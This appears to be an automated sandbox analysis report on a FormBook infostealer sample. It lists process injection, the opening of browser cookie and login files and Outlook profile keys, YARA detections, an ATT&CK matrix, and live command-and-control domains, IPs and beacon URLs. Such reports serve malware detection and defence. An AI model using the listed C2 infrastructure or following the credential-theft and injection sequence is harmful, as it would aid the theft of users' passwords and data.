            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread register set: target process: 1804Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\netbtugc.exeThread APC queued: target process: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 25F8008Jump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe"Jump to behavior
            Source: C:\Program Files (x86)\MHeTeskWqSyLbFZdyNgiLQpDiRfAxzGTAuvHusywoeEAcYyuvNkCWAetfDEuyLfVWpVkgKqU\DJonRIGNYjBRZ.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: CITA#U00c7#U00c3O.exe, DJonRIGNYjBRZ.exe, 00000005.00000002.4152464556.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000000.1913786779.0000000000D21000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000000.2069872570.00000000019B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: DJonRIGNYjBRZ.exe, 00000005.00000002.4152464556.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000000.1913786779.0000000000D21000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000000.2069872570.00000000019B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: DJonRIGNYjBRZ.exe, 00000005.00000002.4152464556.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000000.1913786779.0000000000D21000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000000.2069872570.00000000019B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: DJonRIGNYjBRZ.exe, 00000005.00000002.4152464556.0000000000D20000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000005.00000000.1913786779.0000000000D21000.00000002.00000001.00040000.00000000.sdmp, DJonRIGNYjBRZ.exe, 00000007.00000000.2069872570.00000000019B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: CITA#U00c7#U00c3O.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: CITA#U00c7#U00c3O.exeBinary or memory string: WIN_XP
            Source: CITA#U00c7#U00c3O.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: CITA#U00c7#U00c3O.exeBinary or memory string: WIN_XPe
            Source: CITA#U00c7#U00c3O.exeBinary or memory string: WIN_VISTA
            Source: CITA#U00c7#U00c3O.exeBinary or memory string: WIN_7
            Source: CITA#U00c7#U00c3O.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2670000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4151245699.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4152977911.0000000003290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4152890125.0000000003240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2006339526.0000000007BD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2001885118.0000000002670000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4152933454.00000000041F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2002697433.0000000005290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		5
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		5
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS16
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		5
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets141
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519260 Sample: CITA#U00c7#U00c3O.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 28 www.woshop.online 2->28 30 www.tekilla.wtf 2->30 32 19 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 5 other signatures 2->48 10 CITA#U00c7#U00c3O.exe 1 2->10         started        signatures3 process4 signatures5 60 Writes to foreign memory regions 10->60 62 Maps a DLL or memory area into another process 10->62 64 Switches to a custom stack to bypass stack traces 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 DJonRIGNYjBRZ.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Modifies the context of a thread in another process (thread injection) 19->54 56 3 other signatures 19->56 22 DJonRIGNYjBRZ.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.nobartv6.website 103.224.182.242, 49774, 49775, 49776 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 22->34 36 www.kexweb.top 63.250.47.40, 49754, 49755, 49756 NAMECHEAP-NETUS United States 22->36 38 9 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            CITA#U00c7#U00c3O.exe63%ReversingLabsWin32.Backdoor.FormBook
            CITA#U00c7#U00c3O.exe100%AviraHEUR/AGEN.1321671
            CITA#U00c7#U00c3O.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://www.kexweb.top/3bdq/0%Avira URL Cloudsafe
            http://www.sailnway.net/lrst/?y0qt3F=mDrmkSN/AS2kB6lxw+ox9UfR9hI3CHIhmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KclyEBWGGMepgvGhsxtLzd1Vd+SluWBGSo6Y=&kZ=E8WpI0%Avira URL Cloudsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            http://www.dyme.tech/h7lb/0%Avira URL Cloudsafe
            https://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle100%Avira URL Cloudmalware
            http://www.languagemodel.pro/nxfn/?y0qt3F=6j3CvtUhPdUgNSN69nh1RWvnIL+RhJE9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVeUaFaQwVg8/fN6RHd5lVuyrWHiNmavf3gAw=&kZ=E8WpI0%Avira URL Cloudsafe
            https://www.gandi.net/en/domain0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            http://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=&kZ=E8WpI100%Avira URL Cloudmalware
            http://www.omexai.info/7xi5/?y0qt3F=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&kZ=E8WpI100%Avira URL Cloudmalware
            http://www.languagemodel.pro/nxfn/0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.dyme.tech/h7lb/?y0qt3F=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&kZ=E8WpI0%Avira URL Cloudsafe
            https://whois.gandi.net/en/results?search=languagemodel.pro0%Avira URL Cloudsafe
            http://www.nobartv6.website/pp43/0%Avira URL Cloudsafe
            http://www.tekilla.wtf/fpzw/100%Avira URL Cloudmalware
            http://www.omexai.info/7xi5/100%Avira URL Cloudmalware
            http://www.nobartv6.website/pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu0%Avira URL Cloudsafe
            http://www.kexweb.top/3bdq/?y0qt3F=mPDvA1qI3GiuntP60bqgVobnrbMnRYp61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exu2k3ruJCpl2j2bvSmTd+X0q2Ansy3FLMFak=&kZ=E8WpI0%Avira URL Cloudsafe
            http://www.mizuquan.top/e0nr/0%Avira URL Cloudsafe
            http://www.bola88site.one/3qit/100%Avira URL Cloudmalware
            http://www.jobworklanka.online/ikh0/0%Avira URL Cloudsafe
            http://www.jobworklanka.online/ikh0/?y0qt3F=lvx8xqKuEeZXr5ITqNCHPh3uOhDJ1jEsZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1vJ6qU/h+jhYmRiU/b4DSTDHjmvsEtFplu6A=&kZ=E8WpI0%Avira URL Cloudsafe
            http://www.nobartv6.website/pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVu5vGFEpVLHigJkCccCfv+m7blBfZ8lkEAhE=&kZ=E8WpI0%Avira URL Cloudsafe
            http://www.tekilla.wtf/fpzw/?kZ=E8WpI&y0qt3F=vk5QQsijTkj0pfF2YbFfXs6zKmlYZL+gcHfTrVh5yCT2NPNs5yeYEP2CyzpPbJkscWMx5aBCkSlgAfiy0IyVw6vzCqwT6MlUYIeNh7VIWund7P0tYTSeyak=100%Avira URL Cloudmalware
            http://www.sailnway.net0%Avira URL Cloudsafe
            http://www.sailnway.net/lrst/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.elsupertodo.net
            		148.72.152.174
            		truetrue
              		unknown
              webredir.vip.gandi.net
              		217.70.184.50
              		truetrue
                		unknown
                www.nobartv6.website
                		103.224.182.242
                		truetrue
                  		unknown
                  www.kexweb.top
                  		63.250.47.40
                  		truetrue
                    		unknown
                    bola88site.one
                    		172.96.191.39
                    		truetrue
                      		unknown
                      www.dyme.tech
                      		13.248.169.48
                      		truetrue
                        		unknown
                        www.mizuquan.top
                        		43.242.202.169
                        		truetrue
                          		unknown
                          redirect.3dns.box
                          		172.191.244.62
                          		truetrue
                            		unknown
                            jobworklanka.online
                            		91.184.0.200
                            		truetrue
                              		unknown
                              omexai.info
                              		3.33.130.190
                              		truetrue
                                		unknown
                                natroredirect.natrocdn.com
                                		85.159.66.93
                                		truetrue
                                  		unknown
                                  www.tekilla.wtf
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.omexai.info
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.sailnway.net
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.woshop.online
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.languagemodel.pro
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.bola88site.one
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.jobworklanka.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.arlon-commerce.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.kxshopmr.store
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown

                                                    Contacted URLs

                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.dyme.tech/h7lb/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.omexai.info/7xi5/?y0qt3F=ixI46zwDNWOoK0d6d59SvpgDB+zqSFA+qsFL+v4hzxqFGT4p3+8WtoPKGUs/aT1fkDncxQRflpqJVuNQFbELBx/+PEXrpF63uptF2gwKAcNaoJelZ45iHH4=&kZ=E8WpItrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.kexweb.top/3bdq/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.sailnway.net/lrst/?y0qt3F=mDrmkSN/AS2kB6lxw+ox9UfR9hI3CHIhmXXSSGppVfotDkdoE42/10NRLtLdcVyNlafsoPF4t6hSrFGriq6KclyEBWGGMepgvGhsxtLzd1Vd+SluWBGSo6Y=&kZ=E8WpItrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.elsupertodo.net/2jit/?y0qt3F=iS4P4oRSl8BXKzGHIPEeBFILTgF0I4K6JXAZlPSQukWhX6ryYmutle+397gP2E/7l5jfN0VXuv9esRLW6mV1TqEhan6EIKUcOtzcvEOIT7DGSSciknjeHA8=&kZ=E8WpItrue
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.languagemodel.pro/nxfn/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.languagemodel.pro/nxfn/?y0qt3F=6j3CvtUhPdUgNSN69nh1RWvnIL+RhJE9GdmFQzyR6PqyVz5YOV5r49CB0ghAIxZx6PIHaKVcYUnZkN+R6pfVeUaFaQwVg8/fN6RHd5lVuyrWHiNmavf3gAw=&kZ=E8WpItrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.dyme.tech/h7lb/?y0qt3F=RbPHaORuq3VLsIvFE+kS4135sHK2QWKtxUtCmsRXGI6jytYd3WVHAygqsg9m4sx7IXgloFX+8G+vydQZJLP0V+w2gPP1i9gS6DQX/6Khz8EBa74P+FOl6aE=&kZ=E8WpItrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.nobartv6.website/pp43/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.tekilla.wtf/fpzw/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.omexai.info/7xi5/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.mizuquan.top/e0nr/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kexweb.top/3bdq/?y0qt3F=mPDvA1qI3GiuntP60bqgVobnrbMnRYp61+amzFfuWlPCagi05gb63n03Sa0iFCs5HVPasI6LuL9f8nEGr4Exu2k3ruJCpl2j2bvSmTd+X0q2Ansy3FLMFak=&kZ=E8WpItrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.bola88site.one/3qit/true
                                                    • Avira URL Cloud: malware
                                                    		unknown
                                                    http://www.jobworklanka.online/ikh0/true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.jobworklanka.online/ikh0/?y0qt3F=lvx8xqKuEeZXr5ITqNCHPh3uOhDJ1jEsZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1vJ6qU/h+jhYmRiU/b4DSTDHjmvsEtFplu6A=&kZ=E8WpItrue
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.nobartv6.website/pp43/?y0qt3F=/yzCblrJsERuqgz3jJaeg3gXWqInWNIu+6Zh8/8YqB01FuO+DLXfgclvHnt3CWNuGllXtp08GnLQKJ2iCtjVu5vGFEpVLHigJkCccCfv+m7blBfZ8lkEAhE=&kZ=E8WpItrue
                                                    • Avira URL Cloud: safe
